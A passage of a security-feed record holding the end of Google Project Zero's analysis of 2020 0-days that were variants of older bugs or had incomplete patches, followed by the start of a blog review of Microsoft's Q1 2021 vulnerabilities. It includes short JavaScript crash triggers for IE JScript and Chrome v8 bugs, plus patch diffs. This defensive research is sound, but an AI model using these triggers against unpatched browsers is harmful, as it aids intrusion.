happens\n\n// it returns one of the string variables\n\n// which is stored in a temporary variable\n\n// on the stack, not tracked by garbage collector\n\n// 4. Second callback (d.toString) happens\n\n// There, string variables get freed\n\n// and the space reclaimed\n\n// 5. Crash happens when attempting to access\n\n// string content of the temporary variable\n\nvar b = e + d;\n\nalert(b);\n\n}\n\n// 1. create two objects with toString callbacks\n\nvar o1 = { toString: f1 };\n\nvar o2 = { toString: f2 };\n\n// 2. create a bunch of string variables\n\nfor (var a = 0; a < 20000; a++) {\n\nspray[a] = \"aaa\";\n\n}\n\nboom(); \n \n--- \n \nIn addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of \u201cplug and play\u201d quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit. \n\n## Firefox CVE-2020-6820\n\nMozilla patched [CVE-2020-6820 in Firefox with an out-of-band security update](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/>) in April 2020. It is a use-after-free in the Cache subsystem. \n\nCVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. If the StreamControl (must be the Parent which lives in the browser process in order to get the use-after-free in the browser process; the Child would only provide in renderer) still has ReadStreams when StreamList::CloseAll is called, then this will cause the CacheStreamControlParent to be freed. The mId member of the CacheStreamControl parent is then subsequently accessed, causing the use-after-free.\n\nThe execution patch for CVE-2020-6820 is:\n\nStreamList::CloseAll \u2190 Patched function\n\nCacheStreamControlParent::CloseAll\n\nCacheStreamControlParent::NotifyCloseAll\n\nStreamControl::CloseAllReadStreams\n\nFor each stream:\n\nReadStream::Inner::CloseStream\n\nReadStream::Inner::Close\n\nReadStream::Inner::NoteClosed\n\n\u2026\n\nStreamControl::NoteClosed\n\nStreamControl::ForgetReadStream\n\nCacheStreamControlParent/Child::NoteClosedAfterForget\n\nCacheStreamControlParent::RecvNoteClosed\n\nStreamList::NoteClosed\n\nIf StreamList is empty && mStreamControl:\n\nCacheStreamControlParent::Shutdown\n\nSend__delete(this) \u2190 FREED HERE!\n\nPCacheStreamControlParent::SendCloseAll \u2190 Used here in call to Id() \n \n--- \n \nCVE-2020-6820 is a variant of an internally found Mozilla vulnerability, [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>). 1507180 was discovered in November 2018 and [patched in December 2019](<https://hg.mozilla.org/mozilla-central/rev/cdf525897bff>). 1507180 is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, [an explanatory comment](<https://hg.mozilla.org/mozilla-central/rev/25beb671c14a>) for why the December 2019 patch was needed was added in early March 2020. \n\nFor 150718 the execution path was the same as for CVE-2020-6820 except that the the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls \u201chigher\u201d in StreamList::CloseAll.\n\nIn my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [[1](<https://bugzilla.mozilla.org/show_bug.cgi?id=1626728#c15>), [2](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180#c10>)]), has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn\u2019t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our [in-the-wild tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>) and thus included in this list.\n\n## Chrome for Android CVE-2020-6572\n\n[CVE-2020-6572](<https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_7.html>) is use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that a `unique_ptr` is assigned to another, going out of scope which means it can be deleted, while at the same time a raw pointer from the originally referenced object isn't updated. \n\nMore specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder). \n\nThis vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle [reported a very similar vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730>), [CVE-2019-13695](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop.html>). CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it\u2019s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.\n\nIn addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The [vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311>) is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is [CVE-2019-5870](<https://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html>). Guang Gong used this vulnerability as a part of an Android exploit chain. He presented on this exploit chain at Blackhat USA 2020, \u201c[TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>)\u201d. \n\nWhile one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This [was noted in the issue tracker ](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311#c8>)for CVE-2019-5870 and then [brought up again](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730#c1>) after Man Yue Mo reported CVE-2019-13695.\n\n## Windows splwow64 CVE-2020-0986\n\n[CVE-2020-0986](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and [CVE-2019-0880](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0880>), which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D. \n\nFrom this [great write-up from ByteRaptors](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>) on CVE-2019-0880 the pseudo code that allows the controlling of the memcpy is:\n\nvoid GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)\n\n{\n\n...\n\nif(*((BYTE*)(firstAddress + 0x4)) == 0x75){\n\nULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));\n\nif(memcpyDestinationAddress != NULL){\n\nULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));\n\nDWORD copySize = *((DWORD*)(firstAddress + 0x28));\n\nmemcpy(memcpyDestinationAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nThe equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed as highlighted below.\n\nvoid GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)\n\n{\n\n...\n\nif(*((BYTE*)(msgSend + 0x4)) == 0x6D){\n\n...\n\nULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));\n\nif(srcAddress != NULL){\n\nDWORD copySize = *((DWORD*)(msgSend + 0x40));\n\nif(copySize <= 0x1FFFE) {\n\nULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));\n\nmemcpy(destAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nIn addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, CVE-2020-0986 was also not patched completely and the vulnerability was still exploitable even after the patch was applied. This is detailed in the \u201cExploited 0-days not properly fixed\u201d section below.\n\n## Freetype CVE-2020-15999\n\nIn October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, [CVE-2020-15999](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>). [The vulnerability is a heap buffer overflow](<https://savannah.nongnu.org/bugs/?59308>) in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.\n\nIn November 2014, Project Zero team member [Mateusz Jurczyk reported CVE-2014-9665](<https://bugs.chromium.org/p/project-zero/issues/detail?id=168>) to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small. \n\nTo patch CVE-2014-9665, [Freetype added a check to the rows and width](<http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/sfnt/pngshim.c?id=54abd22891bd51ef8b533b24df53b3019b5cee81>) prior to calculating the size as shown below.\n\nif ( populate_map_and_metrics )\n\n{\n\nFT_Long size;\n\nmetrics->width = (FT_Int)imgWidth;\n\nmetrics->height = (FT_Int)imgHeight;\n\nmap->width = metrics->width;\n\nmap->rows = metrics->height;\n\nmap->pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap->pitch = map->width * 4;\n\nmap->num_grays = 256;\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( map->rows > 0x7FFF || map->width > 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\nsize = map->rows * map->pitch; <- overflow size\n\nerror = ft_glyphslot_alloc_bitmap( slot, size );\n\nif ( error )\n\ngoto DestroyExit;\n\n} \n \n--- \n \nTo patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_Sbit_Png` function and changed to `imgHeight` and `imgWidth`, the width and height values that are included in the header of the PNG. \n\nif ( populate_map_and_metrics )\n\n{\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\n+\n\nmetrics->width = (FT_UShort)imgWidth;\n\nmetrics->height = (FT_UShort)imgHeight;\n\nmap->width = metrics->width;\n\nmap->rows = metrics->height;\n\nmap->pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap->pitch = map->width * 4;\n\nmap->num_grays = 256;\n\n- /* reject too large bitmaps similarly to the rasterizer */\n\n- if ( map->rows > 0x7FFF || map->width > 0x7FFF )\n\n- {\n\n- error = FT_THROW( Array_Too_Large );\n\n- goto DestroyExit;\n\n- }\n\n[...] \n \n--- \n \nTo summarize: \n\n * CVE-2014-9665 caused a buffer overflow by overflowing the size field in the size = map->rows * map->pitch; calculation.\n * CVE-2020-15999 caused a buffer overflow by truncating metrics->width and metrics->height which are then used to calculate the size field, thus causing the size field to be too small.\n\nA fix for the root cause of the buffer overflow in November 2014 would have been to bounds check imgWidth and imgHeight prior to any assignments to an unsigned short. Including the bounds check of the height and widths from the PNG headers early would have prevented both manners of triggering this buffer overflow. \n\n## Apple Safari CVE-2020-27930\n\nThis vulnerability is slightly different than the rest in that while it\u2019s still a variant, it\u2019s not clear that by current disclosure norms, one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there\u2019s no true \u201cupstream\u201d. However when vulnerabilities were reported in Microsoft\u2019s, Apple\u2019s, or Adobe\u2019s fork, there is a possibility (though no guarantee) that it was also in the others.\n\nCVE-2020-27930 vulnerability was used in an exploit chain for iOS. The [variant, CVE-2015-0993, was reported](<http://bugs.chromium.org/p/project-zero/issues/detail?id=180>) to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft\u2019s implementation of Adobe\u2019s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack. \n\n[CVE-2020-27930](<https://support.apple.com/en-us/HT211929>), the vulnerability exploited in-the-wild in 2020, is very similar. The vulnerability this time is in the callothersubr operator in Apple\u2019s implementation of Adobe\u2019s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write. \n\nSix years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There\u2019s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.\n\n# Exploited 0-days not properly fixed\u2026 \ud83d\ude2d\n\nThree vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor. \n\nProduct\n\n| \n\nVulnerability that was exploited in-the-wild\n\n| \n\n2nd patch \n \n---|---|--- \n \nInternet Explorer\n\n| \n\nCVE-2020-0674\n\n| \n\nCVE-2020-0968 \n \nGoogle Chrome\n\n| \n\nCVE-2019-13764*\n\n| \n\nCVE-2020-6383 \n \nMicrosoft Windows\n\n| \n\nCVE-2020-0986\n\n| \n\nCVE-2020-17008/CVE-2021-1648 \n \n* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild \n \n## Internet Explorer JScript CVE-2020-0674\n\nIn the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, it still didn\u2019t comprehensively fix all of the variants. Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>) in April 2020. We show the trigger in the section above.\n\n## Google Chrome CVE-2019-13674\n\n[CVE-2019-13674](<https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html>) in Chrome is an interesting case. When it was [patched in November 2019](<https://chromium.googlesource.com/v8/v8/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), it was not known to be exploited in-the-wild. Instead, [it was reported by security researchers Soyeon Park and Wen Xu](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>). Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That\u2019s when he realized that the patch didn\u2019t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei\u2019s blog post, \u201c[Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)\u201d. \n\nTo summarize, the vulnerability is a type confusion in Chrome\u2019s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8\u2019s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8\u2019s integer type is that it is not closed under addition meaning that adding two integers doesn\u2019t always result in an integer. An example of this is +Infinity + -Infinity = NaN. \n\nTherefore, the following line is sufficient to trigger CVE-2019-13674. Note that this line will not show any observable crash effects and the road to making this vulnerability exploitable is quite long, check out [this blog post](<https://googleprojectzero.blogspot.com/>) if you\u2019re interested! \n\nfor (var i = -Infinity; i < 0; i += Infinity) { } \n \n--- \n \n[The patch](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>) that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.\n\nvar increment = -Infinity;\n\nvar k = 0;\n\n// The initial loop value is 0 and the increment is -Infinity.\n\n// This is permissible because 0 + -Infinity = -Infinity, an integer.\n\nfor (var i = 0; i < 1; i += increment) {\n\nif (i == -Infinity) {\n\n// Once the initial variable equals -Infinity (one loop through)\n\n// the increment is changed to +Infinity. -Infinity + +Infinity = NaN\n\nincrement = +Infinity;\n\n}\n\nif (++k > 10) {\n\nbreak;\n\n}\n\n} \n \n--- \n \nTo \u201crevive\u201d the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. [This incomplete fix was reported](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) to Chrome in February 2020. [This patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) was more conservative: it bailed as soon as the type detected that increment can be +Infinity or -Infinity. \n\nUnfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible \u201ctype confusions\u201d. Again, check out [Sergei\u2019s blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>) if you\u2019re interested in more details. \n\nThis is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it\u2019s important to work towards \u201ccorrect & comprehensive\u201d patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry [knows there is a detection gap](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) in our ability to detect 0-days exploited in-the-wild. We don\u2019t find and detect all exploited 0-days and we certainly don\u2019t find them all in a timely manner. \n\n## Windows splwow64 CVE-2020-0986\n\nThis vulnerability has already been discussed in the previous section on variants. After [Kaspersky reported that CVE-2020-0986 was actively exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only[ disclosed as exploited in-the-wild in August 2020](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). \n\nMicrosoft\u2019s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn\u2019t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. [This issue was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.\n\n# Correct and comprehensive patches\n\nWe\u2019ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year. \n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes. \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.\n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nWhile the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.\n\nIn 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis work on other vulnerabilities as well. We hope more researchers will join us in this work. (If you\u2019re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: [my talk at BluehatIL 2020](<https://www.youtube.com/watch?v=mC1Pwsdy814>) and [Ki Chan Ahn at OffensiveCon 2020](<https://www.youtube.com/watch?v=fTNzylTMYks>).)\n\nIn addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-02-03T00:00:00", "type": "googleprojectzero", "title": "\nD\u00e9j\u00e0 vu-lnerability\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9665", "CVE-2015-0093", "CVE-2015-0993", "CVE-2018-8653", "CVE-2019-0880", "CVE-2019-1367", "CVE-2019-13674", "CVE-2019-13695", "CVE-2019-13764", "CVE-2019-1429", "CVE-2019-5870", "CVE-2020-0674", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-15999", "CVE-2020-17008", "CVE-2020-27930", "CVE-2020-6383", "CVE-2020-6572", "CVE-2020-6820", "CVE-2021-1648"], "modified": "2021-02-03T00:00:00", "id": "GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38", "href": "https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-03-26T00:33:35", "description": "Hello everyone! It has been 3 months since [my last review of Microsoft vulnerabilities for Q4 2020](<https://avleonov.com/2021/01/11/vulristics-vulnerability-score-automated-data-collection-and-microsoft-patch-tuesdays-q4-2020/>). In this episode I want to review the Microsoft vulnerabilities for the first quarter of 2021. There will be 4 parts: January, February, March and the vulnerabilities that were released between the Patch Tuesdays.\n\n![](https://avleonov.com/wp-content/uploads/2021/03/vulristics.png)\n\nI will be using the reports that I created with my [Vulristics tool](<https://github.com/leonov-av/vulristics>). This time I'll try to make the episodes shorter. I will describe only the most critical vulnerabilities. Links to the full reports are at the bottom of the blog post.\n\n## January 2021\n\n * All vulnerabilities: 83\n * Urgent: 0\n * Critical: 1\n * High: 28\n * Medium: 51\n * Low: 3\n\nSo, what was interesting in January. The only critical vulnerability was Microsoft Defender Remote Code Execution (CVE-2021-1647). "Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized."\n\nThe most interesting High level vulnerability is Microsoft splwow64 Elevation of Privilege (CVE-2021-1648). "According to Maddie Stone, a researcher at Google Project Zero credited with identifying this vulnerability, CVE-2021-1648 is a patch bypass for CVE-2020-0986, which was exploited in the wild as a zero-day."\n\nAlso, vendors paid attention to a large number of Remote Procedure Call Runtime Remote Code Executions (CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701) and Windows Remote Desktop Security Feature Bypass (CVE-2021-1669). But there are still no signs of exploitation for them. They are all labeled High in the Vulristics report.\n\nThere were no public exploits for any of the January vulnerabilities. January was a quiet and calm month.\n\n## February 2021\n\n * All vulnerabilities: 57\n * Urgent: 1\n * Critical: 2\n * High: 21\n * Medium: 31\n * Low: 2\n\nOne Urgent level vulnerability is Elevation of Privilege in Win32k component of Windows 10 and Windows Server 2019 (CVE-2021-1732). According to Microsoft, this vulnerability has been exploited in the wild. "Successful exploitation would elevate the privileges of an attacker, potentially allowing them to create new accounts, install programs, and view, modify or delete data". Public exploit in a form of Metasploit Module is found at Vulners ([Win32k ConsoleControl Offset Confusion](<https://vulners.com/packetstorm/packetstorm:161880>)).\n\nBut the situation with other critical vulnerabilities is interesting. None of the VM vendors mentioned them in their Patch Tuesday reviews.\n\n * This is Microsoft Exchange Server Spoofing Vulnerability (CVE-2021-24085), which is mentioned on [AttackerKB](<https://attackerkb.com/topics/taeSMPFD8J/cve-2021-24085>) and for which public exploit is found at Vulners ([Microsoft Exchange Server msExchEcpCanary CSRF / Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161528>)). This is not the same vulnerability that was exploited in HAFNIUM. We'll get to those vulnerabilities later.\n * Two other vulnerabilities, Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1698) and Microsoft Exchange Server (CVE-2021-1730), were exploitated in the wild. Therefore, the Vulristics Vulnerability Score is higher for them.\n\nIf vendors ignored these vulnerabilities, what vulnerabilities did they mention in their reports? \n\n * Primarily they wrote about Windows TCP/IP Remote Code Execution Vulnerabilities. "Microsoft released a set of fixes affecting Windows TCP/IP implementation that include two Critical Remote Code Execution (RCE) vulnerabilities (CVE-2021-24074 and CVE-2021-24094) and an Important Denial of Service (DoS) vulnerability (CVE-2021-24086). While there is no evidence that these vulnerabilities are exploited in wild, these vulnerabilities should be prioritized given their impact."\n * Also about Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-24078). "RCE flaw within Windows server installations when configured as a DNS server. Affecting Windows Server versions from 2008 to 2019, including server core installations, this severe flaw is considered \u201cmore likely\u201d to be exploited and received a CVSSv3 score of 9.8. This bug is exploitable by a remote attacker with no requirements for user interaction or a privileged account. As the vulnerability affects DNS servers, it is possible this flaw could be wormable and spread within a network."\n\nBut for these 2 vulnerabilities, there are still no public exploits or signs of active exploitation in the wild. This, of course, does not mean that these vulnerabilities do not need to be fixed. When we see the exploitation of these vulnerabilities the wild, it will be a disaster.\n\n## March 2021\n\n * All vulnerabilities: 82\n * Urgent: 0\n * Critical: 0\n * High: 36\n * Medium: 43\n * Low: 3\n\nAnd again, we see in the top not exactly the same vulnerabilities that VM vendors pointed out in their reviews.\n\n * Windows Container Execution Agent Elevation of Privilege Vulnerability (CVE-2021-26891). Just because a public exploit was found at Vulners ([Microsoft Windows Containers Privilege Escalation](<https://vulners.com/packetstorm/packetstorm:161734>)). \n * Internet Explorer Memory Corruption (CVE-2021-26411). "A memory corruption vulnerability in Internet Explorer that was exploited in the wild as a zero-day. In order to exploit the flaw, an attacker would need to host the exploit code on a malicious website and convince a user through social engineering tactics to visit the page, or the attacker could inject the malicious payload into a legitimate website". Exploitation in the wild is mentioned at [AttackerKB](<https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411>).\n\nBut we also see several Windows DNS Server Remote Code Executions . "All five of these CVEs were assigned 9.8 CVSSv3 scores and can be exploited by an unauthenticated attacker when dynamic updates are enabled. According to an analysis by researchers at McAfee, these CVEs are not considered \u201cwormable,\u201d yet they do evoke memories of CVE-2020-1350 (SIGRed), a 17-year-old wormable flaw patched in July 2020." In general, updating DNS Server is never a bad thing.\n\nAnd where is the most important thing? Naturally these are Exchange vulnerabilities and they were published between Patch Tuesdays. I made a special script to get such CVEs.\n\n## Other Q1 2021\n\n * All vulnerabilities: 85\n * Urgent: 0\n * Critical: 7\n * High: 5\n * Medium: 27\n * Low: 46\n\nThe 7 critical vulnerabilities are those Microsoft Exchange Server Remote Code Executions exploited in recent attacks. They have signs of exploitation in the wild at [AttackerKB](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855>) and [Microsoft](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). However, we still don't see public exploits.\n\n"[ProxyLogon](<https://proxylogon.com/>) is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution. All affected components are vulnerable by default! As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server through an only opened 443 port!"\n\nEverything is extremely serious with these vulnerabilities and if you have public unpatched Exchange servers, then there is a good chance that you have already been hacked. For example, by HAFNIUM.\n\n"Hafnium is a state-sponsored threat actor identified by the Microsoft Threat Intelligence Center (MSTIC)".\n\n"Recently, Hafnium has engaged in a number of attacks using previously unknown exploits targeting on-premises Exchange Server software. To date, Hafnium is the primary actor we\u2019ve seen use these exploits, which are discussed in detail [by 